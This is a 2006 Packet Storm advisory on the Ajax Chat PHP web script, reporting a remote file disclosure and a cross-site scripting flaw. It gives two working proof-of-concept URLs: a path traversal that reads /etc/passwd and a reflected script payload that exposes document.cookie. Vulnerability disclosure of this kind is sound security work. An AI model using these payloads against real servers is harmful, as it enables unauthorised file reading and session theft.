ajaxchat.txt

2006-08-17T00:00:00
ID PACKETSTORM:48942
Type packetstorm
Reporter Sirdarckcat
Modified 2006-08-17T00:00:00

Description

                                        
                                            `Discovered by Sirdarckcat from elhacker.net  
  
Ajax Chat  
http://www.pcdiscs.co.uk/chat/  
==============================================  
  
Ajax Chat is a web script for making an online  
chat based on PHP and AJAX.  
  
This has a Remote File Disclosure and a XSS bug.  
  
==============================================  
  
RFD PoC:  
  
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00  
  
==============================================  
  
XSS PoC:  
  
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>  
  
  
==============================================  
  
Att.  
Sirdarckcat  
elhacker.net`